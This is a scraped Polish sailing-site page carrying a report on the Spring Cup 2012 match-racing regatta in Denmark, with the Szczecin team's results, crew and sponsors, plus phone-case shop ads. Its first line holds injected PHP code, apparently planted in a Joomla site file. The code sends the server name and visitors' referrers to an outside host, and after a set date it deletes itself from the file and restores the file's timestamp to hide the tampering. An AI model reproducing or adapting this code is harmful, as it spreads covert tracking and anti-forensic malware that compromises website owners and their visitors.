check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727466){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } Jacht.pl - Rejsy Morskie, Czartery Jachtów, Szkolenia Żeglarskie, Sklep Żeglarski - Relacja z regat Spring Cup 2012

Czartery jachtów typu bareboat, czartery ze skiperem. Atrakcyjne upusty nawet do 20% , oferta last-minute i one-way sprawdź konkretny termin czarteru. Morze Śródziemne, Karaiby, Seszele, Tajlandia....

Polecamy !
  Oryginalne Etui 3D do telefonu
  bezpieczne zakupy na Allegro !
galerie przedmiotow na aukcje
Start Artykuły Aktualności Relacja z regat Spring Cup 2012

To był niezmiernie trudny żeglarsko weekend dla załogi Patryk Zbroja Yacht Racing Team. W dniach 23.-25.03. na wodach cieśniny Sund, odbyły się regaty Spring Cup, zaliczane do Pucharu Świata w match racingu, organizowane, jak co roku, przez Royal Danish Yacht Club w Skovshoved. Na starcie stanęły znakomicie przygotowane załogi Duńskie (8 ekip) z team'ami J. Aschenbrennera (poz. 24 w światowym rankingu sterników ISAF) i R. Viltofta (poz. 30) na czele, a także żeglarze z Wlk. Brytanii (M.Lees), Norwegii (M.Mehus), Szwecji (V.Ogeman) i Polski (P.Zbroja).


Piątkowe treningi, z uwagi na zalegającą nad cieśniną Sund mgłę, zostały odwołane. Sobota przywitała uczestników również gęstą mgłą i brakiem wiatru. Dopiero wczesnym popołudniem udało się przeprowadzić pierwsze wyścigi. Poziom regat był niezwykle wyrównany. W zasadzie każdy mógł wygrać z każdym. O zwycięstwie w danym wyścigu decydowała mniejsza ilość błędów i nierzadko po prostu większe szczęście.

Patryk Zbroja Yacht Racing Team
Szczecińska załoga po dwóch zwycięstwach i jednej porażce pierwszego dnia, w niedzielę nadal liczyła się w rozgrywce o awans do rundy finałowej. Niestety, pomimo wygranych rozgrywek przedstartowych szczecinianie przegrali dwa decydujące wyścigi z R. Viltoftem oraz C. Ulrikkeholm. Zwłaszcza ostatnia przegrana, pomimo dużej przewagi po pierwszej halsówce, mocno utkwiła w pamięci.

Patryk Zbroja Yacht Racing Team
Pozostał duży niedosyt. W przeciwieństwie do pierwszych, ubiegłorocznych startów na 11,5-metrowych jachtach klasy DS-37, technicznie jacht został już dobrze opanowany. Szczecinianie zdecydowanie poprawili również procedurę przedstartową (na 5 startów, przegrali tylko jeden w sobotę - zadecydowało słabsze wyczucie jachtu od przeciwników; brakowało po prostu piątkowego treningu). Choć na pewno widać było różnicę w szybkości jachtu przy niektórych manewrach. Jest tutaj obszar do zagospodarowania do kolejnych startów…

Patryk Zbroja Yacht Racing Team

Szczecinianie startowali w regatach w następującym składzie:

- Łukasz Czaja - dziobowy,
- Maciej Gonerko - trymer żagli przednich,
- Krzysztof Żełudziewicz - pitman, co-trymer,
- Mateusz Szulakowski - trymer grota, taktyk,
- Patryk Zbroja - sternik.

Ostatecznie Polacy zostali sklasyfikowani na 7 miejscu, choć żegluga była zdecydowanie lepsza niż ostateczne wyniki. Cóż, to jest jednak match racing, liczy się tylko zwycięstwo. Jak mawiał Sir Thomas Lipton: "Your Majesty, there is no second".

Kolejne starty już wkrótce. W kwietniu załoga Patryk Zbroja Yacht Racing Team zamierza zakończyć przygotowania do wodowania jachtu Tomahawk w Szczecinie. A w dniach 27-29.04. szczecinianie wezmą udział w regatach w Szwajcarii nad Jez. Bodeńskim - Match Race Kreuzlingen. Z uwagi na stosunkowo wysokie miejsce w światowym rankingu, szczecinianie zostali zakwalifikowani do tej imprezy bez konieczności przejścia dodatkowych eliminacji.

Partnerami załogi w sezonie 2012 są:
- organizatorzy cyklu regat meczowych w Polsce - Polish Match Tour,
- port jachtowy Marina Hotele w Szczecinie,
- marka Szczecin Floating Garden, Patryk Zbroja Yacht Racing Team bierze udział w programie Ambasador Szczecina,
- polski dystrybutor prestiżowej odzieży żeglarskiej włoskiej firmy SLAM

Fotografie autorstwa Kai Morawiec


 
Znajdź nas na FaceBooku

  Kup w naszym sklepie na Allegro ! Wyróżnij się wśród innych swoim oryginalnym etui 3D na telefon !

   Zobacz nasze wzory: Batman, Stitch - Sticz, Star Wars - Lord Darth Vader, Minionek, Minionki, Myszka Minnie Miki,
   Disney Prosiaczek, Konik Pony - Jednorożec, Starbucks.

panel allegro
    Posiadamy bogatą ofertę Etui / Case do modeli telefonów:
   Apple: Apple iPhone 4/4S, Apple iPhone 5/4S/SE. Huawei: Huawei Y5 II, Huawei Y6 II, Huawei P8 Lite, Huawei P9 Lite.
   Samsung: Galaxy J3, Samsung Galaxy J310, Samsung Galaxy J5 (2016), Samsung Galaxy Grand Prime G530, Samsung Galaxy A5, Samsung Galaxy A5/E5.
   LG: LG G2 Mini, LG Leon 4G LTE C50, LG K8, LG K10.